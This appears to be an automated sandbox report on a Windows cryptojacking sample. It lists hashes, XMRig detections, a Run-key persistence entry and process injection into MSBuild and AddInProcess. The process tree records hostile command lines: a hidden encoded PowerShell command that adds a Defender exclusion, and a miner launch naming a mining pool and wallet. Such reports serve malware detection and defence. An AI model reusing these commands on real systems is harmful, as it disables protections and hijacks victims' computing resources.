Analysis
-
max time kernel
306s -
max time network
306s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
08/10/2023, 22:25
Static task
static1
Behavioral task
behavioral1
Sample
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
Resource
win10-20230915-en
General
-
Target
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
-
Size
202KB
-
MD5
0d4319ab251ef7326d331fde039c5440
-
SHA1
982d2c249bcccdfda4faa1a4c6b5a974d0948156
-
SHA256
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2
-
SHA512
42c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5
-
SSDEEP
3072:vbcmK0rkRsxd/jPvlpc3KTmfhQYH9Rh+/Gfclo5c5d:vImiyd/rU3KTmZF9j+/G
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/1108-103-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-104-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-105-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-109-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-110-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-111-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-112-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-113-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-115-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-116-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral2/memory/1108-117-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 4612 IsInvalid.exe 4400 IsInvalid.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\asdafa = "C:\\Users\\Admin\\AppData\\Roaming\\asdafa.exe" b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\asdafa = "C:\\Users\\Admin\\AppData\\Roaming\\asdafa.exe" IsInvalid.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3008 set thread context of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 4612 set thread context of 4400 4612 IsInvalid.exe 88 PID 4400 set thread context of 832 4400 IsInvalid.exe 89 PID 832 set thread context of 2088 832 MSBuild.exe 96 PID 2088 set thread context of 1108 2088 MSBuild.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
pid Process 4404 ipconfig.exe 2112 ipconfig.exe 424 ipconfig.exe 1052 ipconfig.exe 3120 ipconfig.exe 604 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 208 powershell.exe 208 powershell.exe 208 powershell.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe 2088 MSBuild.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe Token: SeDebugPrivilege 4476 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeIncreaseQuotaPrivilege 208 powershell.exe Token: SeSecurityPrivilege 208 powershell.exe Token: SeTakeOwnershipPrivilege 208 powershell.exe Token: SeLoadDriverPrivilege 208 powershell.exe Token: SeSystemProfilePrivilege 208 powershell.exe Token: SeSystemtimePrivilege 208 powershell.exe Token: SeProfSingleProcessPrivilege 208 powershell.exe Token: SeIncBasePriorityPrivilege 208 powershell.exe Token: SeCreatePagefilePrivilege 208 powershell.exe Token: SeBackupPrivilege 208 powershell.exe Token: SeRestorePrivilege 208 powershell.exe Token: SeShutdownPrivilege 208 powershell.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeSystemEnvironmentPrivilege 208 powershell.exe Token: SeRemoteShutdownPrivilege 208 powershell.exe Token: SeUndockPrivilege 208 powershell.exe Token: SeManageVolumePrivilege 208 powershell.exe Token: 33 208 powershell.exe Token: 34 208 powershell.exe Token: 35 208 powershell.exe Token: 36 208 powershell.exe Token: SeDebugPrivilege 4612 IsInvalid.exe Token: SeDebugPrivilege 4400 IsInvalid.exe Token: SeDebugPrivilege 832 MSBuild.exe Token: SeDebugPrivilege 2088 MSBuild.exe Token: SeLockMemoryPrivilege 1108 AddInProcess.exe Token: SeLockMemoryPrivilege 1108 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1108 AddInProcess.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 3008 wrote to memory of 4196 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 70 PID 3008 wrote to memory of 4196 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 70 PID 4196 wrote to memory of 3120 4196 cmd.exe 72 PID 4196 wrote to memory of 3120 4196 cmd.exe 72 PID 3008 wrote to memory of 4316 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 73 PID 3008 wrote to memory of 4316 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 73 PID 4316 wrote to memory of 604 4316 cmd.exe 75 PID 4316 wrote to memory of 604 4316 cmd.exe 75 PID 3008 wrote to memory of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 3008 wrote to memory of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 3008 wrote to memory of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 3008 wrote to memory of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 3008 wrote to memory of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 3008 wrote to memory of 4476 3008 b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe 76 PID 4612 wrote to memory of 3600 4612 IsInvalid.exe 82 PID 4612 wrote to memory of 3600 4612 IsInvalid.exe 82 PID 3600 wrote to memory of 4404 3600 cmd.exe 84 PID 3600 wrote to memory of 4404 3600 cmd.exe 84 PID 4612 wrote to memory of 1008 4612 IsInvalid.exe 85 PID 4612 wrote to memory of 1008 4612 IsInvalid.exe 85 PID 1008 wrote to memory of 2112 1008 cmd.exe 87 PID 1008 wrote to memory of 2112 1008 cmd.exe 87 PID 4612 wrote to memory of 4400 4612 IsInvalid.exe 88 PID 4612 wrote to memory of 4400 4612 IsInvalid.exe 88 PID 4612 wrote to memory of 4400 4612 IsInvalid.exe 88 PID 4612 wrote to memory of 4400 4612 IsInvalid.exe 88 PID 4612 wrote to memory of 4400 4612 IsInvalid.exe 88 PID 4612 wrote to memory of 4400 4612 IsInvalid.exe 88 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 4400 wrote to memory of 832 4400 IsInvalid.exe 89 PID 832 wrote to memory of 4752 832 MSBuild.exe 90 PID 832 wrote to memory of 4752 832 MSBuild.exe 90 PID 4752 wrote to memory of 424 4752 cmd.exe 92 PID 4752 wrote to memory of 424 4752 cmd.exe 92 PID 832 wrote to memory of 2568 832 MSBuild.exe 93 PID 832 wrote to memory of 2568 832 MSBuild.exe 93 PID 2568 wrote to memory of 1052 2568 cmd.exe 95 PID 2568 wrote to memory of 1052 2568 cmd.exe 95 PID 832 wrote to memory of 2088 832 MSBuild.exe 96 PID 832 wrote to memory of 2088 832 MSBuild.exe 96 PID 832 wrote to memory of 2088 832 MSBuild.exe 96 PID 832 wrote to memory of 2088 832 MSBuild.exe 96 PID 832 wrote to memory of 2088 832 MSBuild.exe 96 PID 832 wrote to memory of 2088 832 MSBuild.exe 96 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 PID 2088 wrote to memory of 1108 2088 MSBuild.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe"C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release2⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:3120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew2⤵
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\system32\ipconfig.exeipconfig /renew3⤵
- Gathers network information
PID:604
-
-
-
C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exeC:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exeC:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release2⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:4404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew2⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\system32\ipconfig.exeipconfig /renew3⤵
- Gathers network information
PID:2112
-
-
-
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exeC:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release4⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew4⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\ipconfig.exeipconfig /renew5⤵
- Gathers network information
PID:1052
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 44hkbozfzb2j1HuG4ZUrYTXbgE4omN34ffTsZjsG2NUs3iwLtMATrei19gDroXxnn8MBLxYV8LdHNQNeDArSYfS55EgagMA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=505⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1108
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ad4d5f6fc68efa239f4636381bdc8dfb
SHA16102ea8c5ffcb473dd6846792fe11a0f34b60b03
SHA2561c4b0505dac9d528e2db53653e5b1c98a38edfad1792f61fab9cfc4b5b6dce72
SHA51285ad0d1bcb7e4ccb4fcc2232d8f8a39bf04a1d85e5a39382486b978ebb31b84325bca560cc591e04f13e60f5a92465f1f604429b4dcab69c59d65014c910aa6f
-
Filesize
1KB
MD5ad4d5f6fc68efa239f4636381bdc8dfb
SHA16102ea8c5ffcb473dd6846792fe11a0f34b60b03
SHA2561c4b0505dac9d528e2db53653e5b1c98a38edfad1792f61fab9cfc4b5b6dce72
SHA51285ad0d1bcb7e4ccb4fcc2232d8f8a39bf04a1d85e5a39382486b978ebb31b84325bca560cc591e04f13e60f5a92465f1f604429b4dcab69c59d65014c910aa6f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe.log
Filesize1KB
MD5ad4d5f6fc68efa239f4636381bdc8dfb
SHA16102ea8c5ffcb473dd6846792fe11a0f34b60b03
SHA2561c4b0505dac9d528e2db53653e5b1c98a38edfad1792f61fab9cfc4b5b6dce72
SHA51285ad0d1bcb7e4ccb4fcc2232d8f8a39bf04a1d85e5a39382486b978ebb31b84325bca560cc591e04f13e60f5a92465f1f604429b4dcab69c59d65014c910aa6f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
202KB
MD50d4319ab251ef7326d331fde039c5440
SHA1982d2c249bcccdfda4faa1a4c6b5a974d0948156
SHA256b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2
SHA51242c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5
-
Filesize
202KB
MD50d4319ab251ef7326d331fde039c5440
SHA1982d2c249bcccdfda4faa1a4c6b5a974d0948156
SHA256b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2
SHA51242c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5
-
Filesize
202KB
MD50d4319ab251ef7326d331fde039c5440
SHA1982d2c249bcccdfda4faa1a4c6b5a974d0948156
SHA256b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2
SHA51242c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5